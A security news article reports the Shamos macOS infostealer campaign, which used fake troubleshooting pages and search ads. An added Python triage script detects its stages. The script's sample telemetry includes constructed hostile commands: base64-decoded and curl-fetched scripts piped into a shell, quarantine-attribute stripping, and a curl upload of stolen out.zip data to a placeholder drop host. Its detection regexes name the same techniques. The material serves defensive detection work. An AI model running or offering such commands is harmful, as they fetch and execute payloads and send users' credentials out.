Fake Mac “Fix” Pages Push New Shamos Infostealer
by Justin Erickson
CrowdStrike reports a campaign (June–August 2025) that used search-ad malvertising and fake “help” sites to trick macOS users into pasting a one-line terminal command that downloads and runs the Shamos infostealer, an Atomic macOS Stealer (AMOS) variant attributed to the COOKIE SPIDER group. The firm says it blocked attempts across 300+ customer environments. The pasted command decodes a URL and pulls a bash script that captures the user’s password, “downloads SHAMOS Mach-O into the /tmp/ directory, removes extended file attributes using xattr likely for bypassing Gatekeeper checks, assigns executable permissions via chmod, and then executes the stealer.”

BleepingComputer and other outlets add that victims are funneled from search ads and spoofed GitHub repositories to “troubleshooting” pages (printer fixes, DNS resolver cache flushing guides, and the like) that present the copy-and-paste command, a lure known as “ClickFix.” Once running, Shamos checks for and steals browser credentials, keychain items, Apple Notes data, and cryptocurrency-wallet files, zips them as out.zip, and exfiltrates the archive via curl. If it obtained sudo privileges, it also installs persistence via a com.finder.helper.plist so the stealer runs again at system startup.

The attack only works if the victim trusts a sponsored, look-alike page and runs the command it supplies. The simplest defense is to never paste a terminal command from a site you reached through a search ad or an unfamiliar “fix” page, and to seek help on the vendor’s official website or its community forums instead. If a command has already been run, treat any stored credentials, keychain items, and wallet seeds on that Mac as compromised.
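The chain above (decode a URL, pipe a fetched script into a shell, strip quarantine attributes in /tmp, chmod the payload, curl out.zip to a drop server, install a com.finder.helper.plist) maps cleanly onto indicators that can be checked against process-execution telemetry or shell history. The following is an added triage example, not CrowdStrike’s or BleepingComputer’s tooling and not code from the campaign; the indicator names, the regexes, and every sample command line (including the .invalid URLs) are constructed for illustration.

```python
"""Heuristic triage for ClickFix-style macOS one-liners in command-line telemetry.

Added example, not the reporting firms' tooling. All sample commands and URLs
below are constructed; the .invalid TLD is reserved and resolves nowhere.
"""
import base64
import binascii
import re

# One indicator per step of the chain described in the article. Each regex
# is deliberately narrow so a hit points at a specific behaviour, not at
# "curl was used"; legitimate installers also fetch scripts, so this is triage
# input, not a blocking rule.
INDICATORS = {
    "base64-decoded-into-shell": re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"),
    "curl-piped-into-shell":     re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b"),
    "quarantine-xattr-stripped": re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b"),
    "chmod-exec-in-tmp":         re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\s+/tmp/"),
    "zip-exfil-via-curl":        re.compile(r"\bcurl\b.*(-F|-T|--data-binary)\s+\S*out\.zip"),
    "finder-helper-plist":       re.compile(r"com\.finder\.helper\.plist"),
}

# A run of 16+ base64-alphabet characters with optional padding. Paths such as
# /Library/LaunchDaemons/com also match, so decode() must tolerate junk.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def decode_hidden_urls(cmd: str) -> list[str]:
    """Decode base64 blobs in a command line and return any URLs they conceal."""
    found = []
    for blob in B64_BLOB.findall(cmd):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue  # not valid base64 (wrong length, or just a long path/hash)
        found.extend(URL_RE.findall(text))
    return found


def analyze(cmd: str) -> dict:
    """Return the indicators a single command line trips, plus any decoded URLs."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return {"cmd": cmd, "indicators": hits, "hidden_urls": decode_hidden_urls(cmd)}


def flag_events(cmds) -> list[dict]:
    """Keep only the command lines that trip at least one indicator."""
    return [a for a in map(analyze, cmds) if a["indicators"]]


# Constructed sample telemetry: two benign lines, then one line per stage of
# the chain. The stage-1 URL is hidden the way the article describes, as a
# base64 blob decoded on the victim's machine.
STAGE1_URL = "https://stage.example.invalid/install.sh"          # constructed
STAGE1_B64 = base64.b64encode(STAGE1_URL.encode()).decode()
SAMPLE_CMDS = [
    "ls -la /tmp",
    "chmod +x /Users/alice/bin/build.sh",
    f"echo {STAGE1_B64} | base64 -d | bash",
    "curl -fsSL https://cdn.example.invalid/setup.sh | sh",
    "xattr -c /tmp/update",
    "chmod +x /tmp/update",
    "curl -F 'file=@/tmp/out.zip' https://drop.example.invalid/upload",
    "launchctl load /Library/LaunchDaemons/com.finder.helper.plist",  # install path assumed
]

if __name__ == "__main__":
    for hit in flag_events(SAMPLE_CMDS):
        print(f"{', '.join(hit['indicators']):28s} {hit['cmd']}")
        for url in hit["hidden_urls"]:
            print(f"{'':28s} -> decoded URL: {url}")
```

Feed it the command lines from whatever records process execution on the host (shell history, an EDR process feed, or unified-log output); a single base64-to-shell hit with a decoded URL is already worth a look, while the xattr, chmod-in-/tmp and out.zip indicators together in a short window are the stronger signal. The decoded URL is the piece an analyst most wants, since it is exactly what the victim never saw before pressing Enter.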
